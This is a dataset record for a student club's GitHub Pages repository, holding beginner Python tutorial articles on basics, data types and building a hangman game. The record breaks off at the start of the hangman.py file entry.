| column | dtype | stats |
| --- | --- | --- |
| repo_name | string | lengths 5–114 |
| repo_url | string | lengths 24–133 |
| snapshot_id | string | lengths 40–40 |
| revision_id | string | lengths 40–40 |
| directory_id | string | lengths 40–40 |
| branch_name | string | 209 classes |
| visit_date | timestamp[ns] | |
| revision_date | timestamp[ns] | |
| committer_date | timestamp[ns] | |
| github_id | int64 | 9.83k–683M, nullable (⌀) |
| star_events_count | int64 | 0–22.6k |
| fork_events_count | int64 | 0–4.15k |
| gha_license_id | string | 17 classes |
| gha_created_at | timestamp[ns] | |
| gha_updated_at | timestamp[ns] | |
| gha_pushed_at | timestamp[ns] | |
| gha_language | string | 115 classes |
| files | list | lengths 1–13.2k |
| num_files | int64 | 1–13.2k |
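The `files` column nests one record per file. As a minimal sketch of how a row with this schema could be inspected with the Hugging Face `datasets` library (the dataset path below is a placeholder, since this dump does not name its source):

```python
# Sketch only: stream one row of a dataset with the schema above and peek
# at its nested `files` records. "your-org/your-dataset" is a placeholder.
from datasets import load_dataset

ds = load_dataset("your-org/your-dataset", split="train", streaming=True)
row = next(iter(ds))

print(row["repo_name"], row["num_files"])
for f in row["files"][:3]:
    # Each entry carries the per-file fields shown in the sample row below.
    print(f["path"], f["language"], f["length_bytes"])
```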
A sample row follows; its `files` list is reproduced in full below the table.

| column | value |
| --- | --- |
| repo_name | cyfaircs/cyfaircs.github.io |
| repo_url | https://github.com/cyfaircs/cyfaircs.github.io |
| snapshot_id | 216f0cb1d24f126afa0033bc1d9da521365a2114 |
| revision_id | ca3cccd6c568f3f0026456a1f0185a09809a7942 |
| directory_id | 9ec3a1f5aaf1c46fea5b2db235c4082f87b0aa7d |
| branch_name | refs/heads/main |
| visit_date | 2022-09-12T02:11:32.653575 |
| revision_date | 2022-09-01T15:04:00 |
| committer_date | 2022-09-01T15:04:00 |
| github_id | 42,316,086 |
| star_events_count | 0 |
| fork_events_count | 0 |
| gha_license_id | null |
| gha_created_at | null |
| gha_updated_at | null |
| gha_pushed_at | null |
| gha_language | null |
[
{
"alpha_fraction": 0.7230145335197449,
"alphanum_fraction": 0.7302206754684448,
"avg_line_length": 58.47321319580078,
"blob_id": "f6f197b6e92c6f0c18c6bf6a20951f1ce50a97d3",
"content_id": "d5b3f4b6ed86d9b3a26ad4ad9e946bfe568960d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6661,
"license_type": "no_license",
"max_line_length": 717,
"num_lines": 112,
"path": "/articles/intro/index1.md",
"repo_name": "cyfaircs/cyfaircs.github.io",
"src_encoding": "UTF-8",
"text": "\n<figcaption>Author: Amr Ojjeh</figcaption>\n<figcaption>Cover By: Amr Ojjeh</figcaption>\n<figcaption>Last updated: June 6, 2021</figcaption>\n\n# Intro to Python\nIf you've not read the previous article, I encourage you to go [back](index.html) and read it.\n\nThis is the first of many articles. The goal of these articles is to introduce you to Python quick and easy, and by the end of these articles, you should have written your first game, Hangman! But first, we must cover the basics.\n\n## Installation\nInstalling Python is relatively simple. Head to the website at [python.org](https://www.python.org/), and go through the installation process.\n\nUsing Python should be just as easy. If you're on Windows, you can open `cmd`, otherwise, you can open the `terminal`. Type `py` or `python`, then press enter. You should be prompted with something like:\n\n\t:::\n\tPython 3.8.6 (tags/v3.8.6:db45529, Sep 23 2020, 15:37:30) [MSC v.1927 32 bit (Intel)] on win32\n\tType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n\t>>>\n\nIf you were not prompted with this, then please contact one of our officers, and we'll be ready to help. If you also don't wish to install Python, then feel free to use [repl.it](https://repl.it).\n\n## Hello World\nWhat you just opened is what's called the \"REPL.\" That is, \"Read, Eval, Print, Loop.\" Simply, it means that Python will read your input, evaluate it, print the result, and then keep repating that process until you quit the program.\n\nLet's print something in the REPL! If you don't already have it open, just as before, you can open it by either typing `py` or `python` in the terminal.\n\n\t:::python\n\t>>> print(\"Hello World!\")\n\tHello World!\n\t>>>\n\nWhat we just did, is we invoked the `print` function, which simply prints the characters we give it. Like a regular math function, we use paranthesis to denote what we're passing to the function. Think of `f(x) = 2x`. To evaluate the function where `x = 2`, we write: `f(2)`. Similiarily, `print` is a function which requires a paramater similar to `x`, and we pass it the value we want the function to print.\n\nThe value, `Hello World!`, is in quotes because it's what we call a `string`. It has that name because it could be thought of as a string of characters, and the reason why strings require quotes is simply to let the program know that we're not writing code, and as such, whatever is inside the string is arbitrary. For instance, we could've also written:\n\n\t:::python\n\t>>> print(\"gasjgaklsjg\")\n\tgasjgaklsjg\n\t>>>\n\nAnd it would work the same way.\n\n## How are you?\nBy introducing two features, we can write a program which greets the user after they input their name.\n\n### Input\nTo do this, as the program implies, we must take input. This can be done easily:\n\n\t:::python\n\t>>> input(\"Enter your name: \")\n\tEnter your name: Amr\n\t'Amr'\n\t>>>\n\nThere are two interesting behaviors to note. For one, the program pauses until I enter some text and hit enter. Secondly, after I do that, `'Amr'` is printed, even though we never used the `print` function.\n\nThe program pauses because that is what `input` does, it takes input, and it'll wait until it has the user's input. `'Amr'` is printed because, unlike `print`, `input` *returns* a value. This means that the `input` function is substituted with the user's input. Recall the math analogy, where `f(x) = 2x`. 
If we invoke `f(x)` as `f(2)`, then that value *can* be substited with its evaluation, `2(2)`, or just `4`. Where the analogy falls apart, is that functions don't always need to return a useful value. Also, function *must* be substitued by the value returned. In this case, `'Amr'` is the returned value. Note the single quotes, they are equivalent to double quotes, which indicate that the value is a `string`.\n\n### Variables\nWe have a way to retrieve the input, but to reference it, we must store it. Doing this is also simple:\n\n\t:::python\n\t>>> name = input(\"Enter your name: \")\n\tEnter your name: Amr\n\t>>> name\n\t'Amr'\n\t>>>\n\n`name` could've been anything. We could've called the variable `boogalo`, but `name` is the most appropriate. Notice, that `'Amr'` is no longer printed after we run `input`. This is because the result is stored in `name`, and the assignment operator, `=`, does not return any value, it only assigns a value.\n\nWe can reference the name stored by simply typing the variable name, as seen above. And we can intuitively use the `+` sign to add to the string, called concatinating. This, however, does not change `name`. To change it, we must use the assignment operator, `=`, again. \n\n\t:::python\n\t>>> name + \"!\"\n\t'Amr!'\n\t>>> name\n\t'Amr'\n\n### Completing the Program\nNow we should be able to greet the user!\n\n\t:::python\n\t>>> name = input(\"Enter your name: \")\n\tEnter your name: Amr\n\t>>> print(\"Hello \" + name + \"!\")\n\tHello Amr!\n\t>>>\n\nThere's an obvious catch with the REPL. To run out program, we must supply it the code as we carry out the program. This does not make for a great user experience, and that is one of the reasons why we use scripts. All a script is, is the code we just wrote, but instead of constantly writing it, we can save it in a file that ends with `.py`.\n\nSo, using notepad, or whatever editor you prefer to use, you can write and save the following code as `greetings.py`, or whichever name you prefer to give your file.\n\n\t:::python\n\tname = input(\"Enter your name: \")\n\tprint(\"Hello \" + name + \"!\")\n\nYou may run the program now by either running `py greetings.py` or `python greetings.py` in your terminal. Note, that the terminal's current directory must be the same one the location of the file. You can change your directory with the command `cd`. Also note that the terminal is unrelated to Python, and is simply how we run Python.\n\nFrom now on, all examples will be shown as if they were written and saved in a file. You are still encouraged, however, to the use the REPL for whenever you are experimenting, since you can run any python code without the hassle of saving.\n\n## Exercise\nWrite a program which asks the user for their age, and print how old they would be in 10 years. To do this, you must use the `int` and `str` functions as such: \n\n\t:::python\n\tsome_number = int(input(\"Enter some number: \")) # Converts the string to an integer\n\tprint(\"Is this your number? \" + str(some_number)) # Convers the integer to a string\n<figcaption markdown=\"span\">More on these two functions will be written about [later](index3.html)</figcaption>\n\n(Feel free to Google or ask for help! Always expect more examples in the upcoming articles, in the case you don't fully get something.)\n\nWhen you're ready, you can read start reading the [next](index2.html) article.\n"
},
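The article above closes with an exercise (print the user's age in 10 years). A minimal solution sketch, using only the `int` and `str` casts the article introduces:

```python
# Possible solution to the exercise: int() parses the typed age,
# str() converts the arithmetic result back for concatenation.
age = int(input("Enter your age: "))
print("In 10 years, you will be " + str(age + 10) + "!")
```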
{
"alpha_fraction": 0.8148148059844971,
"alphanum_fraction": 0.8148148059844971,
"avg_line_length": 26,
"blob_id": "c50bafb656a461850a32f9f945d51ddc9de14411",
"content_id": "25ae5877ec877cfd49079bce44f83cb1c9395624",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 27,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 1,
"path": "/README.md",
"repo_name": "cyfaircs/cyfaircs.github.io",
"src_encoding": "UTF-8",
"text": "# lonestarcyfair.github.io\n"
},
{
"alpha_fraction": 0.6420628428459167,
"alphanum_fraction": 0.6440767049789429,
"avg_line_length": 30.8161563873291,
"blob_id": "3a96d7980fb069193f1b3bdace264358cea2f78e",
"content_id": "4c974874767a7552aaf27412e39ea9b4325708d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 11421,
"license_type": "no_license",
"max_line_length": 535,
"num_lines": 359,
"path": "/articles/intro/index5.md",
"repo_name": "cyfaircs/cyfaircs.github.io",
"src_encoding": "UTF-8",
"text": "\n<figcaption>Author: Amr Ojjeh</figcaption>\n<figcaption>Cover By: Amr Ojjeh</figcaption>\n<figcaption>Last updated: August 16, 2021</figcaption>\n\n# Hangman\n\nIf you've not read the previous article, I encourage you to go [back](index4.html) and read it.\n\nWe'll now be writing hangman! When we're making a game, we have to ask, how do we represent our data?\n\n(To see the full source code, visit [here](https://github.com/cyfaircs/cyfaircs.github.io/blob/main/articles/intro/hangman.py))\n\n## Data\n\nAs we've mentioned before, we have all sorts of data types, but unfortunately, there's no \"Hangman\" type that's provided to us. As programmers, we have to compose the data types we have in order to be able to represent Hangman in memory. So, what kind of data does Hangman need?\n\nFirstly, there's the secret word. That's the word which the user would have to guess.\n\n\t:::python\n\tsecret = \"elephant\"\n<figcaption>We'll discuss selecting new random words later.</figcaption>\n\nWe also want the hangman himself. Note though, that the hangman will have a different art depending on how many incorrect guesses the user took. As such, we can depict Hangman in all his stages by using a list:\n\n\t:::py\n\tHANGMANPICS = [\"\"\"\n\t +---+\n\t | |\n\t |\n\t |\n\t |\n\t |\n\t=========\"\"\", \"\"\"\n\t +---+\n\t | |\n\t O |\n\t |\n\t |\n\t |\n\t=========\"\"\", \"\"\"\n\t +---+\n\t | |\n\t O |\n\t | |\n\t |\n\t |\n\t=========\"\"\", \"\"\"\n\t +---+\n\t | |\n\t O |\n\t /| |\n\t |\n\t |\n\t=========\"\"\", \"\"\"\n\t +---+\n\t | |\n\t O |\n\t /|\\ |\n\t |\n\t |\n\t=========\"\"\", \"\"\"\n\t +---+\n\t | |\n\t O |\n\t /|\\ |\n\t / |\n\t |\n\t=========\"\"\", \"\"\"\n\t +---+\n\t | |\n\t O |\n\t /|\\ |\n\t / \\ |\n\t |\n\t=========\"\"\"]\n<figcaption markdown=\"span\">You can see how the hangman looks on your terminal by printing him out with `print(HANGMANPICS[0])`</figcaption>\n\nWe also want to store the letters guessed correctly, and the letters guessed incorrectly.\n\n\t:::python\n\tcorrect_letters = []\n\tincorrect_letters = []\n<figcaption markdown=\"span\">The `[]` means it's an empty list. We'll be appending letters as the user guesses.</figcaption>\n\nWith that, we have all the data that we need! Notice how we can describe the state of the game with just these variables. This will make programming the game itself much easier.\n\nHere's what the code should look like as of now:\n\n\t:::python\n\tsecret = \"elephant\"\n\n\tHANGMANPICS = [\"\"\"\n\t +---+\n\t | |\n\t |\n\t |\n\t |\n\t |\n\t=========\"\"\", \"\"\"\n\t +---+\n\t | |\n\t O |\n\t |\n\t |\n\t |\n\t=========\"\"\", \"\"\"\n\t +---+\n\t | |\n\t O |\n\t | |\n\t |\n\t |\n\t=========\"\"\", \"\"\"\n\t +---+\n\t | |\n\t O |\n\t /| |\n\t |\n\t |\n\t=========\"\"\", \"\"\"\n\t +---+\n\t | |\n\t O |\n\t /|\\ |\n\t |\n\t |\n\t=========\"\"\", \"\"\"\n\t +---+\n\t | |\n\t O |\n\t /|\\ |\n\t / |\n\t |\n\t=========\"\"\", \"\"\"\n\t +---+\n\t | |\n\t O |\n\t /|\\ |\n\t / \\ |\n\t |\n\t=========\"\"\"]\n\n\tcorrect_letters = []\n\tincorrect_letters = []\n\n\n## The Game Loop\n\nWe're able to describe the game with data, but now we need to actually code the game. To do so, we need to think about how the game will work from the user's perspective. We can do this by writing what should the experience be when playing the game. 
Here's what I'm thinking:\n\n\t'e' was a good guess!\n\t +---+\n\t | |\n\t O |\n\t /| |\n\t |\n\t |\n\t=========\n\n\tIncorrect guesses: z, x, y\n\tWord: e _ e _ _ _ _ _\n\tEnter your guess:\n\n\nWhen the user enters their guess, the screen should clear, then print whether the guess was correct or incorrect, draw the new hangman picture, as well as the incorrect guesses and the word, and finally, it should once again prompt the user, unless there were too many incorrect guesses, or the word was guessed completely.\n\n### Asking for Input\n\nWe as the programmer have a choice to pick any part of that cycle and start working on it. After we finish one part, we can add the next. Because I want to be able to test the game asap, I'll be working on the input functionality. Here's how we'd go about that:\n\n\t:::py\n\tdef prompt_user():\n\t\tletter = input(\"Enter your guess: \")\n\t\treturn letter\n\nThis code might look like it's enough, however, I ask you, what if the user enters a number? What if they enter multiple letters? What if they enter nothing at all? Those are cases we must handle if we wish our game to work consistently and without breaking. Here's how we do this:\n\n\t:::py\n\tdef prompt_user():\n\t\t# For now, take it for granted that \"TEST\".lower()\n\t\t# will return \"test\".\n\t\tletter = input(\"Enter your guess: \").lower()\n\t\tif len(letter) != 1:\n\t\t\tprint(\"Your guess must only be one letter!\")\n\t\t\treturn prompt_user() # We prompt the user again\n\t\telif letter < 'a' or letter > 'z':\n\t\t\tprint(\"Your guess must be an English letter!\")\n\t\t\treturn prompt_user()\n\t\treturn letter\n\nTo keep this article short, I advise you to look at this code carefully and ask what the purpose of each line is.\n\n### Checking correctness of input\n\nNow that we have the input, we should check if it's correct or not. If it isn't, we add it to the incorrect list of letters. If it is, we can add it to the correct list.\n\n\t:::py\n\tdef check_guess(letter):\n\t\tif letter in secret:\n\t\t\t# Just as lower, I insist that\n\t\t\t# you take .append for granted as well.\n\t\t\t# It simply means to add a single value to the list\n\t\t\tcorrect_letters.append(letter)\n\t\t\treturn True\n\t\telse:\n\t\t\tincorrect_letters.append(letter)\n\t\t\treturn False\n\nAgain, we must ask ourselves, is this enough? What if the user enters a letter they've already guessed before? Should we have duplicates in our list? As programmers, we must have an answer to these questions, otherwise, we do not know what our own program does. At its current state, lists can have duplicate letters, and users can correctly guess the same letter twice, as well as fail the same way twice. In my version of Hangman, I'd consider that impossible, so here's how I rectify the function:\n\n\t:::py\n\tdef check_guess(letter):\n\t\tif letter in correct_letters or letter in incorrect_letters:\n\t\t\t# There's a better way of doing this, which\n\t\t\t# I'll introduce another time, but for now, None is not\n\t\t\t# a bad way to indicate that the letter's been guessed before.\n\t\t\treturn None\n\t\tif letter in secret:\n\t\t\tcorrect_letters.append(letter)\n\t\t\treturn True # Correct guess\n\t\tincorrect_letters.append(letter)\n\t\treturn False # Incorrect guess\n<figcaption markdown=\"span\">Notice how we do not have an else anymore. 
This is because the `else` would be redundant, since if the prior `if` were to be true, the function would return True, and it would not proceed to complete the remainder of the code.</figcaption>\n\nNote also that we did not print anything in the function `check_guess`. This is to keep most of the printing in one place, so that our code is organized.\n\n### Win Condition\n\nThe game must eventually come to an end. This is done through a win, or a loss condition. Let's write a function which checks for that:\n\n\t:::py\n\tdef unique_letters(word):\n\t\tunique = []\n\t\tfor i in word:\n\t\t\tif not (i in unique):\n\t\t\t\tunique.append(i)\n\t\treturn unique\n\n\tdef win_condition():\n\t\tif len(incorrect_letters) == len(HANGMANPICS) - 1:\n\t\t\treturn False # User has lost\n\t\tif len(correct_letters) == len(unique_letters(secret)):\n\t\t\treturn True # User has won\n\t\treturn None # User has neither won or lost. Game is still going.\n\nI'll leave it as an exercise for you to understand the logic of these two functions.\n\n### Writing the Main Loop\n\n\t:::py\n\tdef start_game():\n\t\tprint(HANGMANPICS[len(incorrect_letters)])\n\t\tguess = prompt_user()\n\t\tis_correct = check_guess(guess)\n\t\tif is_correct == None:\n\t\t\tprint(\"You've already made the guess \" + guess + \"!\")\n\t\telif not is_correct:\n\t\t\tprint(guess + \" was incorrect!\")\n\t\telse:\n\t\t\tprint(guess + \" was a good guess!\")\n\t\tstart_game()\n\nWe're almost there! We've defined all the functions that we need, so now we just need to call the `start_game` function to start our game. We can do this by calling the function at the end of the file, after all the functions have been defined. The hangman picture updates, the program is able to tell the difference between a good guess and a bad guess, but, we can't win or lose yet, and if we do lose, the program crashes. Also, it's the same secret word everytime, and the screen doesn't clear. Those are simple additions, however.\n\n### Final Touches\n\nAdding the win condition should be easy, as we've already defined the functions which we need for the logic to work. So, we just need to write two new functions that will print the lose or win screen, and write the logic in `start_game`:\n\n\t:::py\n\tdef win_screen():\n\t\tprint(HANGMANPICS[len(incorrect_letters)])\n\t\tprint(\"You won! The secret word was: \" + secret)\n\n\tdef lose_screen():\n\t\tprint(HANGMANPICS[-1])\n\t\tprint(\"You lost! The secret word was: \" + secret)\n\n\tdef start_game():\n\t\tif win_condition() != None:\n\t\t\tif win_condition():\n\t\t\t\twin_screen()\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\tlose_screen()\n\t\t\t\treturn\n\t\t# ...\n\nSelecting a random word requires us to *import* new functionality. I won't go too much about how this works, but you can write `from random import randint`. 
This will provide us with a function called `randint`, a function which we don't have to define, similar to how we don't have to define `print` or `input`.\n\nWe can now generate the secret word instead of assigning it `\"elephant\"`:\n\t\n\t:::py\n\twords = [\"ant\",\"baboon\",\"badger\",\"bat\",\"bear\",\"beaver\",\"camel\",\"cat\",\"clam\",\"cobra\",\"cougar\",\"coyote\",\"crow\",\"deer\",\"dog\",\n\t\"donkey\",\"duck\",\"eagle\",\"ferret\",\"fox\",\"frog\",\"goat\",\"goose\",\"hawk\",\"lion\",\"lizard\",\"llama\",\"mole\",\"monkey\",\"moose\",\n\t\"mouse\",\"mule\",\"newt\",\"otter\",\"owl\",\"panda\",\"parrot\",\"pigeon\",\"python\",\"rabbit\",\"ram\",\"rat\",\"raven\",\"rhino\",\"salmon\",\n\t\"seal\",\"shark\",\"sheep\",\"skunk\",\"sloth\",\"snake\",\"spider\",\"stork\",\"swan\",\"tiger\",\"toad\",\"trout\",\"turkey\",\"turtle\",\"weasel\",\n\t\"whale\",\"wolf\",\"wombat\",\"zebra\"]\n\tsecret = words[randint(0, len(words) - 1)]\n\n`randint` will generate a random number between 0 and the length of the words list minus 1, and then use that number to select a random word from the words list.\n\nSimilarily, to clear the screen, we can `import os` and `import sys` at the top of the file, then define the function `clear` so that we can invoke it during our game loop:\n\t\n\t:::py hl_lines=\"10\"\n\tdef clear():\n\t\tif sys.platform == \"win32\":\n\t\t\tos.system(\"cls\")\n\t\telse:\n\t\t\tos.system(\"clear\")\n\n\tdef start_game():\n\t\t# ...\n\t\tguess = prompt_user()\n\t\tclear()\n\t\t# ...\n\n### Exercise\nThe game is completed! Mostly. If you look back at our vision, \n\n\t'e' was a good guess!\n\t +---+\n\t | |\n\t O |\n\t /| |\n\t |\n\t |\n\t=========\n\n\tIncorrect guesses: z, x, y\n\tWord: e _ e _ _ _ _ _\n\tEnter your guess:\n\nyou will see that we don't print the incorrect guesses, or the secret word as it's being filled. Writing those functions will be your exercise! The game loop should look like this after you're done:\n\n\t:::py hl_lines=\"10 11\"\n\tdef start_game():\n\t\tif win_condition() != None:\n\t\t\tif win_condition():\n\t\t\t\twin_screen()\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\tlose_screen()\n\t\t\t\treturn\n\t\tprint(HANGMANPICS[len(incorrect_letters)])\n\t\tprint_incorrect_guesses()\n\t\tprint_secret_word()\n\t\tguess = prompt_user()\n\t\tclear()\n\t\tis_correct = check_guess(guess)\n\t\tif is_correct == None:\n\t\t\tprint(\"You've already made the guess \" + guess + \"!\")\n\t\telif not is_correct:\n\t\t\tprint(guess + \" was incorrect!\")\n\t\telse:\n\t\t\tprint(guess + \" was a good guess!\")\n\t\tstart_game()\n\nGood luck and have fun!"
},
{
"alpha_fraction": 0.6925864815711975,
"alphanum_fraction": 0.7083247303962708,
"avg_line_length": 45.21052551269531,
"blob_id": "f7ab1bbbbb89f51d17c130d8b5c81e3ea5c0220d",
"content_id": "157210d533d92aa0dbce5f3a09f4efc47ced9c37",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 9658,
"license_type": "no_license",
"max_line_length": 612,
"num_lines": 209,
"path": "/articles/intro/index3.md",
"repo_name": "cyfaircs/cyfaircs.github.io",
"src_encoding": "UTF-8",
"text": "\n<figcaption>Author: Amr Ojjeh</figcaption>\n<figcaption>Cover By: Amr Ojjeh</figcaption>\n<figcaption>Last updated: June 6, 2021</figcaption>\n\n# Data Types\n\nIf you've not read the previous article, I encourage you to go [back](index2.html) and read it.\n\nThe goal of the series is to introduce the fundementals of programming, specifically in Python. We've covered if statements, and some basic input and output. However, there is one concept, the most important one, which I've avoided covering so far, and that is data types.\n\nRecall in our last two articles, we used the functions `str` and `int`, but I've never really explained what either one does. Also recall the equality operators, such as `>=` and `==`, what do they return? And what's the difference between a string or a number? This article should answer all these questions.\n\nI recommend you open your REPL alongside as you read this article, as you should execute any code shown here. A benefit of the repl is that you don't need to write `print` like I do in the code, as the REPL automatically prints the result (Read, Eval, **Print**, Loop).\n\n## Types\nBefore we explore what each type is, it's important that we talk about what is a type, first, and why they even exist.\n\nYou may have heard before that computers run on numbers. Everything is either a 0 or a 1, or as they say, in binary. Yet, how come you don't see this text as a string of numbers, but as English?\n\nThis question may arise, because the statement above, while true, is incomplete. Not only everything in memory is stored in binary, a row of 0s and 1s, but the way the numbers are *interpreted,* can vary.\n\nSuppose I give you a sticky note with the number 2 on it. This 2 on its own, means nothing. It *could* be denoting length, perhaps in meters, or it could be describing an area, maybe in ft<sup>2</sup>. However, until I specify what it represents, you are only left guessing.\n\nUnlike a human, though, a computer cannot guess. It must be told what each number represents, and that is what types do. A type \"integer,\" tells the computer that the number is a whole number. A type \"float\" indicates that the number has a fraction, such as 1.2. A \"string,\" is a bit more complicated (think of how many languages there are!), but essentially, it tells the computer that these number**s** represent characters. How strings, floats, and integers differ will not be covered in this series, as that's a rabbit hole of its own, but if I ever write an article on this matter, I'll provide a link here.\n\nThere are a ton more types which exist in Python, but to keep this short, I'll be covering the most important ones.\n\n## Numbers\nAs mentioned, there are two ways to represent numbers. They can either be an integer or float. An integer must be a whole number, while a float must have a fraction. You can observe the type of each variable or constant with the function `type`.\n\n\t:::py\n\ta = 2\n\tprint(type(a)) # <class 'int'>\n\tb = 2.2\n\tprint(type(b)) # <class 'float'>\n<figcaption>The integer type is often obreviated as \"int\"</figcaption>\n\nEach type comes with its own set of operations. The `+` sign, even though it's used with many different types, actually behaves differently depending on the types given. 
For now, the difference is minor, but you'll see a major difference when we get to [lists](#lists).\n\n\t:::python\n\ta = 2\n\tb = 2.2\n\tprint(type(b + b)) # <class 'float'>\n\tprint(type(a + a)) # <class 'int'>\n\tprint(type(a + b)) # <class 'float'>\n<figcaption markdown=\"span\">The `+` operator returns different types depending on the operands. When it's given an integer and a float, it convers the integer to a float.</figcaption>\n\nSubtraction and multipication behave similar to addition with respect to numbers, so they won't be covered.\n\nDivision, however, comes in two forms.\n\n\t:::python\n\ta = 4\n\tb = 3\n\tc = a / b\n\td = a // b\n\tprint(c) # 1.3333...\n\tprint(type(c)) # <class 'float'>\n\tprint(d) # 1\n\tprint(type(d)) # <class 'int'>\n\nA single slash, regardless of the operands, returns a float, while a double slash will truncate the fraction and return an int.\n\nNote that you should be careful when comparing floats, as they are sometimes approximates. For instance:\n\n\t:::python\n\tprint(.1 + .2) # 0.30000000000000004\n\nThis is due to the fact that numbers are stored in binary. This will be another topic for another time, however, as it goes beyond the scope of the series. If you require a workaround, message one of the officers. If you need an immediate solution, you can consult [Python's documentation](https://docs.python.org/3/library/math.html#math.isclose).\n\n## Lists\nIn life, everyone would like their cookies under a single container, and that's what lists do. You can store a series of related, or unrelated (though that's not recommended), values as a single value.\n\n\t:::python\n\twords = [\"lemon\", \"juice\", \"grape\", \"cow\", \"farm\", \"beer\", \"animal\", 32]\n\tprint(type(words)) # <class 'list'>\n\tprint(words[0]) # lemon\n\tprint(words[7]) # 32\n\tprint(words[-1]) # 32\n\tprint(words[-8]) # lemon\n\tprint([1, 2, 3, 4][0]) # 1\n\nWe can use the index operator, `[]`, to reference an item in the list. The first item is referenced by 0. Referencing an item which doesn't exist, such as `words[8]` or `words[-9]`, returns an error and halts the program. Referencing a negative index refers from the end of the list.\n\nWe can also change a value using the index operator:\n\n\t:::python\n\twords = [\"cat\", \"dog\"]\n\twords[0] = \"rat\"\n\tprint(words) # ['rat', 'dog']\n\nLists also utilize the `+` operation, but it has a different behavior. When two lists are added, they are appended.\n\n\t:::python\n\tsome_numbers = [1, 2, 3, 4]\n\tother_numbers = [5]\n\tprint(some_numbers + other_numbers + [1, 2, 3]) # [1, 2, 3, 4, 5, 1, 2, 3]\n\nAs with the `+`, lists also support multipication, `*`.\n\n\t::python\n\tprint([2, 3] * 4) # [2, 3, 2, 3, 2, 3, 2, 3]\n\nAn error is returned when a list is added to any other type.\n\nWe can remove an item or items in a list using the `del` keyword:\n\n\t:::python\n\ttest = [1, 2, 3, 4]\n\tdel test[0]\n\tprint(test) # [2, 3, 4]\n\tdel test[1:3]\n\tprint(test) # [2]\n\nYou can find the length of a list using the `len` function.\n\n\t:::python\n\tprint(len([1, 2, 3, 4, 5])) # 5\n\nFinally, we can retrieve a subset of the list using the colon, `:`, character:\n\n\t:::python\n\tprint([1, 2, 3, 4, 5][1:3]) # [2, 3]\n<figcaption>The \"3\" is exclusive. One way to think about it, is that 3 - 1 specifies the length of the list, starting from index 1.</figcaption>\n\n## Strings\nStrings are very similar to lists, except they are immutable, meaning they cannot be changed. 
And they are initialized by quotes (single or double) instead of brackets.\n\n\t:::python\n\tprint(type(\"Hello!\")) # <class 'str'>\n\ttest = 'cool!'\n\t# test[0] = \"d\" # ERROR: NOT ALLOWED\n\tprint(test[0]) # c\n\tprint(test[1:3]) # oo\n\tprint(test + \"!\") # cool!!\n\tprint(test * 3) # cool!cool!cool!\n\tprint(len(test)) # 5\n\nThere are also multiline strings. If you notice, if you try to press enter in the middle of a string to add a new line, Python will crash. There are ways to get around this, but for now, you can use multiline strings, which allow for tabs and newlines (the enter). To make a multiline string, which to be clear, are just strings, you use three double quotes or single quotes instead of just one:\n\n\t:::python\n\ttest = \"\"\"\n\tThat\n\tIs\n\tCool\n\t\"\"\"\n\ttest2 = '''\n\twow\n\t'''\n\tprint(test)\n\tprint(test2)\n\n## Booleans\nBooleans can either be `True` or `False`. Operators which return booleans are all the comparison operators, such as `==`, `<=`, `>`, `>=`, `!=`, etc..\n\n\t:::python\n\tfirst = True\n\tprint(type(first)) # <class 'bool'>\n\tprint(first) # True\n\tprint(first == True) # True\n\tprint(first != True) # False\n\tprint(3 > 2) # True\n\tprint(3 > 3) # False\n\tprint(3 >= 3) # True\n<figcaption markdown=\"span\">The `!=` means \"not equal to.\"</figcaption>\n\nVery importantly, if statements use booleans to judge whether they should run or not. You should also know that booleans have a lot of uniqeu operators, such as `not`, `and`, and `or`.\n\n\t:::python\n\tif True:\n\t\tprint(\"This will print no matter what\")\n\tif False:\n\t\tprint(\"This will never print\")\n\n\tif x > 2 and x < 4:\n\t\tprint(\"We're in the range!\")\n\nThe `and` operator means that both operands have to be `True` for `and` to also return `True`, otherwise it returns `False`.\n\nThe `or` operator means that only one of the operands have to be `True` for the expression to evaluate to `True`, otherwise it's `False`.\n\nThe `not` operator only takes one operand, and it always returns the opposite value. So, `not False` = `True`.\n\n## Casting\nNow we get to the functions `int`, `str`, `float`, and `list`. They should all make sense now. Say we have a string which we want to treat as an integer, how do we go about that? Assuming it's a valid string, i.e. there are no letters, we can use the `int` function to *cast* it.\n\n\t:::python\n\ttest = \"2\"\n\t# print(test + 2) # error\n\tprint(int(test) + 2) # 4\n\nThis is why we wrap our `input` with `int` when we're expecting an integer.\n\n\t:::python\n\tuser_input = int(input(\"Enter your number: \"))\n\nIf we would like a float instead of an int, we can use the `float` function. If you'd like to go from a number to a string, then you use the `str` function.\n\n\t:::python\n\tage = 24\n\tprint(\"My age is \" + str(24))\n\nThe `list` function is also important, but as its use cases have not become apparent yet, we will skip it for now.\n\n## Exercise\nGiven the user's input, return half the string they entered. For instance, if the user enters \"crazy\", the program should print \"cra\". If they enter \"lame\", the program should print \"la\".\n\nWhen you're ready, you can read start reading the [next](index4.html) article.\n"
},
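The data-types article ends with an exercise (print half of the user's input). A minimal solution sketch using `len`, floor division, and slicing, all introduced above:

```python
# Possible solution: slice the first half of the input, rounding up
# so "crazy" (5 letters) prints "cra" and "lame" (4 letters) prints "la".
word = input("Enter a word: ")
half = (len(word) + 1) // 2
print(word[0:half])
```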
{
"alpha_fraction": 0.528312087059021,
"alphanum_fraction": 0.5302085876464844,
"avg_line_length": 22.66025733947754,
"blob_id": "a486343c0c93e4a30e29fea48bb9257368dafcda",
"content_id": "bbcf58efd0430aab7d485d08f84cee4dddab8e37",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3691,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 156,
"path": "/articles/intro/hangman.py",
"repo_name": "cyfaircs/cyfaircs.github.io",
"src_encoding": "UTF-8",
